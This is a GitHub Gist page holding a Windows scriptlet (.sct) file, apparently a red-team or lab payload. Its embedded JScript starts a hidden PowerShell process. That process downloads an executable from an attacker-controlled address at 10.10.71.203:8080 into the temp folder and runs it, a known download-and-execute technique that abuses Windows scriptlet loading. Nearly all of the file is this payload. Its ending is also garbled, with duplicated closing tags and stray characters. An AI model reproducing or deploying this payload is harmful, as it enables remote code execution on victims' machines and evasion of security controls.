Last active
September 8, 2017 05:46
-
-
Save void-in/a78e5676ace2ff25551d409c2a8fb041 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="test" | |
progid="test" | |
version="1.00" | |
classid="{BBBB4444-0000-0000-0000-0000FAADACDC}" | |
remotable="true" | |
> | |
</registration> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c $z=echo ($env:temp+'\cwIWCTq5.exe');(new-object System.Net.WebClient).DownloadFile('http://10.10.71.203:8080/', "$z");invoke-item $z"); | |
]]> | |
</script> | |
</scriptlet>"); | |
]]> | |
</script> | |
</scriptlet> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment